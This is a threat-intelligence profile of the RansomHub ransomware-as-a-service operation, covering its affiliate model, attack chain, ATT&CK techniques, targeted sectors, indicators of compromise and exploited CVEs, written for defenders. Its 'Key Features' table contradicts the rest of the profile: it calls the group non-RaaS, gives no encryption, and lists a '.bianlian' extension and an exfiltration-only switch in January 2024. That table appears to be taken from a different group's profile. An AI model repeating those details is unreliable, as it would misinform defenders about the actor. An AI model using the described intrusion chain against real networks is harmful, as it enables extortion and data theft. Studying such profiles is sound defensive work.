THREAT ACTOR

RansomHub

5
THREAT LEVEL
EMERGENCE DATE
Feb 2024
CATEGORY
Ransomware-as-a-Service
AFFILIATIONS

Former Knight ransomware affiliates, ALPHV/BlackCat actors, Evil Corp, forums like RAMP

DEscription

RansomHub emerged in February 2024 as a ransomware-as-a-service (RaaS) operation, rapidly becoming the most prolific RaaS platform by late 2024. Distinguished by an exceptionally generous affiliate commission structure offering up to ninety percent of proceeds, the group attracted experienced operators from dismantled operations. After claiming numerous victims globally, the infrastructure went completely dark on April 1, 2025.

CRITICALITY
Assesses the importance of the potential target, including their size/scale, data's value, and operational impact.
lethality
Evaluates the potential for damage from the attack, including the ability to disrupt operations, and cause financial loss, damage public brand image.
AGGRESSIVENESS
Assesses the psychological and tactical intensity of the group’s behavior, including targeted harassment, violent language, blackmail, and political motives.

Classifications & Affiliations

Type: Ransomware-as-a-Service (RaaS) platform

Operating as a Ransomware-as-a-Service (RaaS) platform, RansomHub distinguished itself through an exceptionally generous 90% affiliate commission structure. The platform evolved from the Cyclops and Knight variants, launching within hours of Knight's source code sale in February 2024 and attracting displaced operators from ALPHV/BlackCat and connections to Evil Corp.

The high-commission RaaS model combined with multi-platform support across Windows, Linux, ESXi, FreeBSD, and macOS enabled rapid ecosystem dominance. Strict affiliate policies enforced compliance with negotiation protocols, threatening permanent bans for violations, while the platform maintained operational security by avoiding CIS countries and other restricted regions until its sudden shutdown on April 1, 2025.

Current Status: Inactive as of April 1, 2025. (Threat levels reflect the threat actor's activity level)

Threat Level:
5

Origins and Methodology

RansomHub filled the void created by law enforcement disruptions against established groups, introducing innovations in affiliate management while leveraging proven encryption techniques. The operation's rapid rise demonstrated the persistent demand for RaaS platforms among cybercriminal affiliates seeking stable infrastructure and favorable commission structures.

The ransomware utilized intermittent encryption, processing 0x100000 byte chunks while skipping 0x200000 bytes, significantly reducing encryption time while maintaining file unusability. This approach combined with multi-threaded execution enabled rapid compromise of large environments.

What is the Evolution of RansomHub Ransomware?
0.1
Formation

Launching within 24 hours of Knight's source code sale, the group prepared infrastructure and immediate operational capability. Initial recruitment focused on displaced affiliates from disrupted operations, with the 90% commission rate proving highly attractive to experienced operators.

0.2
EVOLUTION

Towards the end of 2024, the operation dominated the ransomware landscape with the highest victim count among active groups. Technical evolution included EDRKillShifter integration, expanded platform support across Windows, Linux, ESXi, FreeBSD, and macOS, and improved C2 infrastructure. Despite stated policies avoiding certain sectors, the group targeted critical infrastructure when profitable opportunities arose.

0.3
Lineage/Connections

The Cyclops → Knight → RansomHub progression shows clear code inheritance, with shared encryption routines and obfuscation methods. Former ALPHV/BlackCat affiliates brought established TTPs, while Evil Corp connections provided money laundering networks. This convergence created a uniquely capable operation until its sudden shutdown.

Which Unique Techniques Does RansomHub Use?

Emerging as a dominant force in the ransomware ecosystem, RansomHub employed mature attack methodologies refined through affiliate expertise and technical innovation.

TECHNIQUE

DETAILS

Infection Vectors

Primary access occurs through phishing campaigns delivering malicious attachments (T1566), active exploitation of ProxyShell vulnerabilities, and compromised RDP credentials (T1078) sourced from Initial Access Brokers.
Recent campaigns actively exploit SAP NetWeaver zero-day flaws (T1190), targeting enterprise resource planning systems. The group leverages VPN gateway misconfigurations and targets organizations with inadequate multi-factor authentication (MFA) implementations.

Target Selection

Healthcare organizations face heightened targeting due to patient safety implications and operational criticality. Government entities attract focus for classified and sensitive citizen data repositories.
Professional services firms, encompassing legal and accounting practices, experience risks from proprietary client information exposure. Manufacturing sectors increasingly encounter threats through SAP system exploitation campaigns, with geographic focus spanning North America, Europe, and Asia-Pacific regions.

Operational Complexity

Advanced capabilities manifest through obfuscated binaries, UPX-packing for detection evasion, and strategic deployment of legitimate tools including AnyDesk and TeamViewer for operational camouflage. Comprehensive network reconnaissance precedes data exfiltration, while custom Go-coded backdoors ensure persistent access.
Development centers on Go for custom malware creation, complemented by PowerShell for reconnaissance, lateral movement (T1570), and operational automation.

Key Features & Technical Details

The ransomware architecture combined proven encryption methods with performance optimizations for enterprise-scale deployments.

FEATURE

DETAILS

Encryption Method

None - transitioned to exfiltration-only model in January 2024

File Extension

.bianlian (legacy, no longer used)

Ransom Note

Delivered via compromised network printers and direct employee contact

Double Extortion

Pure data exfiltration without encryption, leveraging exposure threats

Communication Channels

.onion negotiation platforms, direct phone calls to victims

Deployment Speed

Variable based on reconnaissance depth, typically 48-72 hours

Payment Method

Bitcoin exclusively, demands range $250,000 to several million

Operational Model

Closed group structure, non-RaaS with internal tool development

Activities

Maintaining aggressive operational tempo throughout the last year, the group established dominance in the ransomware ecosystem before sudden cessation. Peak activity in Fall 2024 demonstrated the platform's appeal to affiliates seeking profitable targets across diverse sectors.

Which Industries Are Most Vulnerable to RansomHub?

Manufacturing faced the highest targeting frequency due to production downtime costs and intellectual property value, making rapid payment decisions more likely. Healthcare systems experienced significant attacks contradicting stated avoidance policies, with critical patient care systems creating urgency for resolution. Professional services handling sensitive client data attracted double extortion tactics, while financial services suffered attacks targeting both operations and regulatory compliance.

Technology companies lost valuable source code and customer databases, government entities saw citizen services disrupted, and critical infrastructure including water/wastewater and transportation faced increasing attention during the group's final operational months.

HAL Most Recent Attacks

Modus Operandi

The attack chain leveraged both automated tools and manual techniques, allowing affiliates to adapt tactics based on target environments.

Details

Exploiting CVE-2023-3519 (Citrix NetScaler) and CVE-2020-1472 (ZeroLogon) vulnerabilities provided initial footholds. Password spraying against RDP/VPN services (T1110.003) and phishing campaigns (T1566.001/T1566.002) with malicious payloads expanded access options. Affiliates frequently purchased access from Initial Access Brokers.

Details

Network mapping utilized Angry IP Scanner and Nmap (T1046) to identify systems and services. Active Directory enumeration revealed high-value targets, while automated scripts located backup systems and critical business applications. File share discovery identified sensitive data repositories for exfiltration.

Details

AnyDesk and ScreenConnect (T1219) provided persistent remote access. Cobalt Strike beacons enabled post-exploitation capabilities. Custom backdoors maintained access across security tool updates and system reboots.

Details

EDRKillShifter deployment disabled endpoint protection (T1562.001). Log clearing via WMI (T1070.001) removed forensic evidence. Files renamed to mimic legitimate processes (T1036), with attacks timed during weekends and holidays to delay detection.

Details

Mimikatz (T1003.001) extracted credentials from memory. Configuration files and password stores provided additional access. Cloud credentials and API keys enabled broader compromise across hybrid environments.

Details

Multiple C2 servers using IP addresses like 193.106.175.107 and 45.134.140.69 ensured resilience. TOR infrastructure obscured affiliate identities. Custom protocols evaded network monitoring.

Details

RDP session hopping (T1021.001) and PsExec (T1569.002) enabled movement across networks. Compromised domain controllers provided enterprise-wide access. Pass-the-hash techniques bypassed password requirements.

Details

AWS S3 buckets stored stolen data (T1567.002). FTP servers and custom C2 infrastructure provided alternative channels. WinSCP and RClone automated large-scale transfers. Compression reduced detection likelihood.

Details

Creating new administrative accounts (T1136.001) and re-enabling disabled accounts maintained access. Scheduled tasks (T1053) ensured re-execution after reboots. Registry modifications and service installations provided multiple persistence mechanisms.

Details

Local drives, network shares, and cloud folders faced encryption (T1486). Ransom notes with TOR payment instructions appeared across systems. Business operations halted until resolution, with average downtime exceeding two weeks.

Details

Intermittent encryption processing 0x100000 byte chunks while skipping 0x200000 bytes accelerated deployment. Multi-threaded execution maximized system resources. Avoiding critical system files prevented complete system failure.

Details

Graduated data disclosure on leak sites pressured victims. TOR-based negotiation portals facilitated communication. Bitcoin and Monero payments obscured money flows. Threats of regulatory notification increased pressure on regulated industries.

Details

Volume Shadow Copy deletion (T1490) prevented recovery. Event log clearing removed attack evidence. Anti-forensic scripts overwrote unallocated disk space. Configuration changes disabled recovery options.

Indicators of Compromise (IOCs)

Key indicators help identify RansomHub operations within networks, particularly specific network infrastructure, file system artifacts, and behavioral patterns.

INDICATOR

DETAILS

File Hashes

SHA256: [hash] for def.exe custom backdoor implementation
SHA256: [hash] for encryptor.exe legacy encryption tool
SHA256: [hash] for exp.exe ZeroLogon exploitation utility
SHA256: [hash] for system.exe credential harvesting module

IP Addresses

184.174.96.74 (reverse proxy services)
184.174.96.70 (associated infrastructure)

Domains/URLs

.onion negotiation platforms (specific addresses vary per campaign)

File Paths

C:\ProgramData (common backdoor installation directory)
C:\Windows\Temp (staging location for exfiltration)

File Extensions

.bianlian (legacy, no longer actively used)

Exploits and Vulnerabilities

Affiliates leveraged both known vulnerabilities and configuration weaknesses to establish initial access and maintain persistence.

EXPLOITS AND VULNERABILITIES

CVE

CVSS

DESCRIPTION

SAP NetWeaver Visual Composer

CVE-2025-31324

10.0

Enables remote code execution through unrestricted file upload permitting JSP webshell deployment

ProxyShell - Microsoft Exchange Server

CVE-2021-34473

9.8

Facilitates remote code execution by exploiting authentication handling flaws

ProxyShell - Microsoft Exchange Server

CVE-2021-34523

9.8

Permits privilege escalation during exploitation sequences

ProxyShell Chain Component

CVE-2021-31207

7.2

Allows security control bypass facilitating comprehensive server compromise

ZeroLogon - Netlogon

CVE-2020-1472

10.0

Enables domain controller compromise through cryptographic implementation flaws

Beyond CVE exploitation, affiliates targeted weak RDP credentials, outdated VPN firmware, identity management gaps in hybrid clouds, and unpatched end-of-life systems. The group excelled at chaining vulnerabilities, combining initial access with privilege escalation for rapid domain compromise.